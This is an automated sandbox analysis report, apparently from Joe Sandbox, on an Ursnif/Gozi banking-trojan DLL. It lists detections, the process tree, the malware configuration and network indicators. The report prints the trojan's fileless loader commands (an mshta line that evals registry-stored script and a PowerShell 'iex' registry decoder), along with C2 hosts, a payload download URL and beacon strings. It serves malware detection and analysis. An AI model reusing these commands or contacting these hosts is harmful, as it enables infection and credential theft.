
Analysis Report 5fd9d7ec9e7aetar.dll

Overview

General Information

Sample Name: 5fd9d7ec9e7aetar.dll
Analysis ID: 331120
MD5: 7d675f9a252b26cd655607ae8b36c3e9
SHA1: 522894a5e30417192c053579d583ff7a690316a7
SHA256: 5e7f200f26fb2fc09ca80862fc6bec38f7d539aada080af6461771f9233c054f
Tags: brt, dll, gozi, isfb, ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to get notified if a device is plugged in / out
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5508 cmdline: loaddll32.exe 'C:\Users\user\Desktop\5fd9d7ec9e7aetar.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)
    • control.exe (PID: 5128 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • iexplore.exe (PID: 6276 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6324 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6276 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3880 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 2588 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4380 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17418 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6308 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 5092 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6620 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6180 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 1396 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9CA2.tmp' 'c:\Users\user\AppData\Local\Temp\lcbc4odh\CSCECDBA1D9933D457DB056F31AC2CEEADE.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5044 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5136 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESABD5.tmp' 'c:\Users\user\AppData\Local\Temp\00wddsye\CSCFFAD43D2FB2747A5BC1271AB7CCA8A12.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "whoami": "user@320946hh", "dns": "320946", "version": "250167", "uptime": "175", "crc": "2", "id": "4343", "user": "c2868f8f08f8d2d8cdc8873aab08ddd5", "soft": "3"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(15 entries in total; the first 5 are listed above)

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process started, Author: Joe Security, Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6620, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline', ProcessId: 6180
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started, Author: Michael Haag, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5092, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ProcessId: 6620
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6620, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline', ProcessId: 6180

Signature Overview

AV Detection:

Found malware configuration
Source: loaddll32.exe.5508.0.memstr, Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@320946hh", "dns": "320946", "version": "250167", "uptime": "175", "crc": "2", "id": "4343", "user": "c2868f8f08f8d2d8cdc8873aab08ddd5", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: rosadalking.xyz, Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: 5fd9d7ec9e7aetar.dll, Virustotal: Detection: 12%
Source: 5fd9d7ec9e7aetar.dll, ReversingLabs: Detection: 10%
Source: 0.2.loaddll32.exe.1500000.1.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: C:\Windows\explorer.exe, Code function: 37_2_03B7174C RegisterDeviceNotificationA, 37_2_03B7174C
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_02F632BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_02F632BA
Source: C:\Windows\explorer.exe, Code function: 37_2_03B70180 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 37_2_03B70180
Source: C:\Windows\explorer.exe, Code function: 37_2_03B60C34 FindFirstFileW, 37_2_03B60C34
Source: C:\Windows\explorer.exe, Code function: 37_2_03B5A85C FindFirstFileW,DeleteFileW,FindNextFileW, 37_2_03B5A85C

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Found Tor onion address
Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: Joe Sandbox View, IP Address: 216.58.210.2 216.58.210.2
Source: Joe Sandbox View, JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
Source: Joe Sandbox View, JA3 fingerprint: 7dd50e112cd23734a310b90f6f44a7cd
Source: unknown, TCP traffic detected without corresponding DNS query: 89.44.9.160
Source: unknown, TCP traffic detected without corresponding DNS query: 89.44.9.160
Source: unknown, TCP traffic detected without corresponding DNS query: 89.44.9.160
Source: unknown, TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown, TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown, TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown, TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown, TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown, TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown, TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown, TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown, TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown, TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown, TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown, TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown, TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown, TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown, TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown, TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown, TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: global traffic, HTTP traffic detected: GET /images/PyPG1445hl/46EQl_2BHA_2B7TdC/2kCm72bEjNb0/BR1CjGRrQcU/b_2BmaLHUOoKmw/xeggxPGc7nfKRGZxkwY7m/6XO3LRBusWZ68b2Q/9CuG_2BFhJPugx2/mLb9eBF61d6PEdK9bs/54NcT0amJ/cPoLRcNqBcfX0RKHxYZO/vGw1uksCwbrdZy38AcM/QknS0Ofxufsp/AGlpBU.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: rosadalking.xyzConnection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rosadalking.xyzConnection: Keep-AliveCookie: PHPSESSID=ioak1ilk7vhlu36vv01oie9fv7; lang=en
Source: global traffic, HTTP traffic detected: GET /images/3U_2B2PC7eNms4Rfw/m2bayU1bYGRN/mfyZR8juil8/5WDNQcansH_2FP/bNCVxlxtGYDsy5Ztqa5MO/ZE1uNeIragrUuVu9/t1VvHxGOnUeE0N9/AofD3_2FkZDH3xF9WG/e6QRtMJki/mDfRsmXPGHOJcDq1VRhX/EAwOOQEOyOVMOCO4aMJ/IIjWmZnO6yO6LwKDQCAmcr/fLzp.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: rosadalking.xyzConnection: Keep-AliveCookie: lang=en
Source: global traffic, HTTP traffic detected: GET /images/7fyxdgE16Wzc/NTp3KYRnq_2/FfVuj_2BgOC9g9/ypxwvUsxP_2BjRv4IoOGY/ls8cRjS9_2B9CFok/IIciaBbavff8xIv/QDnJnQxg5GFZWds3Q4/WJYPPBvIM/fTQamjd1C8ZF4x_2BQAG/7tjeWUw0l7HYY5PaqB5/4nRQ7JoUoZ1VN0XTFxi7Cj/sa195v8n0NrfN/CyTgvxQv/A6Pn.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: rosadalking.xyzConnection: Keep-AliveCookie: lang=en
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml0.4.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa064dc64,0x01d6d3de</date><accdate>0xa064dc64,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.4.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa064dc64,0x01d6d3de</date><accdate>0xa064dc64,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.4.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa0673eb6,0x01d6d3de</date><accdate>0xa0673eb6,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.4.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa0673eb6,0x01d6d3de</date><accdate>0xa0673eb6,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.4.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa069a141,0x01d6d3de</date><accdate>0xa069a141,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.4.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa069a141,0x01d6d3de</date><accdate>0xa069a141,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown, DNS traffic detected: queries for: rosadalking.xyz
Source: explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmp, String found in binary or memory: http://%s.com
Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp, String found in binary or memory: http://89.44.9.160/gr32.rar
Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp, String found in binary or memory: http://89.44.9.160/gr32.rarB
Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp, String found in binary or memory: http://89.44.9.160/gr32.rarb
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmp, String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://cerca.lycos.it/
